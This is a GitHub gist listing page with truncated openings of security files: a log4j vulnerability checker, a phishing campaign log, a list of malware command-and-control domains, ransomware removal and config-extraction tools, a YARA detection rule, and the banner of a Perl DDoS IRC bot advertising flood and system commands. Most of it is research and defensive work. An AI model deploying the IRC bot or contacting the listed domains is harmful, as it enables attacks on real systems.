https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
pandazheng pandazheng
byt3bl33d3r
/ log4j_rce_check.py
Created
December 10, 2021 06:02
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python3 | |
| ''' | |
| Needs Requests (pip3 install requests) | |
| Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
| License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License) | |
| This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. |
silence-is-best
/ gist:852a1c7c7dcf29fdc8d5df73433e7676
Created
May 3, 2021 15:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Date,Summary ,Details,Email Payload Type,Users Targeted | |
| 4/1/2021,Malicious email campaign; morning,Swift Mesaj?; zip -> formbook,Attachment,2 | |
| 4/1/2021,Malicious email campaign; morning,"Subjects contain DocuSign, drivewayflags.com sender; link -> hancitor",Link,6528 | |
| 4/1/2021,Malicious email campaign; evening,Yeni Sipari?-HJ0_001; zip -> formbook,Attachment,3 | |
| 4/1/2021,Malicious email campaign; morning,TT Payment for PO-TZI-1804------------01/04/2021; zip -> agenttesla,Attachment,2 | |
| 4/4/2021,Malicious email campaign; morning,Re;Purchase Orders; rar -> formbook,Attachment,7 | |
| 4/5/2021,Malicious email campaign; morning,Subjects contain FarmParts Limited ; xz|iso -> agenttesla continued to 4/7,Attachment,2 | |
| 4/6/2021,Malicious email campaign; morning,Purchase Order; rar -> agenttesla,Attachment,8 | |
| 4/6/2021,Malicious email campaign; evening,Sender address is [email protected]; zip -> agenttesla continued for the month,Attachment,60 | |
| 4/6/2021,Malicious email campaign; evening,MARCH_SWIFT556; r19 -> azorult,Attachment,3 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # C2 FQDNs | |
| first seen fqdn | |
| 2019-12-11 23:37:10 updatemanagir.us | |
| 2019-12-20 17:51:05 cmdupdatewin.com | |
| 2019-12-26 18:03:27 scrservallinst.info | |
| 2020-01-10 00:33:57 winsystemupdate.com | |
| 2020-01-11 23:16:41 jomamba.best | |
| 2020-01-13 05:13:43 updatewinlsass.com | |
| 2020-01-16 11:38:53 winsysteminfo.com | |
| 2020-01-20 05:58:17 livecheckpointsrs.com |
SkyBulk
/ GandCrab4.0RemoveTool.cpp
Created
October 6, 2020 21:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SALSA20.cpp : �������̨Ӧ�ó������ڵ㡣 | |
| // | |
| #include<cryptopp/cryptlib.h> | |
| #include<iostream> | |
| #include<cryptopp/secblock.h> //����SecByteBlock�㷨��ͷ�ļ� | |
| #include<cryptopp/hex.h> //����HexEncoder�㷨��ͷ�ļ� | |
| #include<cryptopp/files.h> //����FileSink�㷨��ͷ�ļ� | |
| #include<cryptopp/osrng.h> //����AutoSeededRandomPool�㷨��ͷ�ļ� | |
| #include<cryptopp/salsa.h> //����Salsa20�㷨��ͷ�ļ� | |
| #include <Windows.h> //CRYPTO����Ʒ |
williballenthin
/ TxR.bt
Created
November 22, 2019 20:49
010 Editor template for parsing Windows Registry TxR (.regtrans-ms) files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //------------------------------------------------ | |
| //--- 010 Editor v8.0.1 Binary Template | |
| // | |
| // File: Transactional Registry Transaction Logs (.TxR) | |
| // Authors: Willi Ballenthin <[email protected]> | |
| // Version: 0.1 | |
| // Reference: https://www.fireeye.com/blog/threat-research/2019/01/digging-up-the-past-windows-registry-forensics-revisited.html | |
| //------------------------------------------------ | |
| LittleEndian(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import sys | |
| import time | |
| import winappdbg | |
| import traceback | |
| class MyEventHandler(winappdbg.EventHandler): | |
| last_alloc_memory = 0 |
stvemillertime
/ MSCopyrightFail
Created
September 20, 2019 22:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule Methodology_VersionEngine_MSCopyrightFail | |
| { | |
| meta: | |
| author = "smiller" | |
| date = "05/15/2019" | |
| description = "This rule looks for a MS copyright string without a terminating period character, which may indicate some manual typing and probably not actually MS." | |
| md5 = "98c72d96350a022fd8e486f9cbcca018" | |
| strings: | |
| $hex = { 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20 00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 00 00 00 00 } | |
| condition: |
Demonslay335
/ globeimposter_config.py
Last active
January 16, 2023 14:49
Extract GlobeImposter ransomware config
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Extract GlobeImposter 2.0 Ransomware Config | |
| Author: @demonslay335 | |
| """ | |
| import os | |
| import sys | |
| import binascii | |
| import re | |
| import hashlib |
zmwangx
/ # Official Windows VM download URL archive.md
Last active
August 19, 2025 19:59
Official Windows VM download URL archive, from https://dev.modern.ie/tools/vms/mac/ — scratch that — https://developer.microsoft.com/en-us/microsoft-edge/api/tools/vms/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl | |
| ###################################################################################################################### | |
| ###################################################################################################################### | |
| ## DDoS Perl IrcBot v1.0 / 2012 by w0rmer Security Team ## [ Help ] ######################################### | |
| ## Stealth MultiFunctional IrcBot writen in Perl ####################################################### | |
| ## Teste on every system with PERL instlled ## !u @system ## | |
| ## ## !u @version ## | |
| ## This is a free program used on your own risk. ## !u @channel ## | |
| ## Created for educational purpose only. ## !u @flood ## |
NewerOlder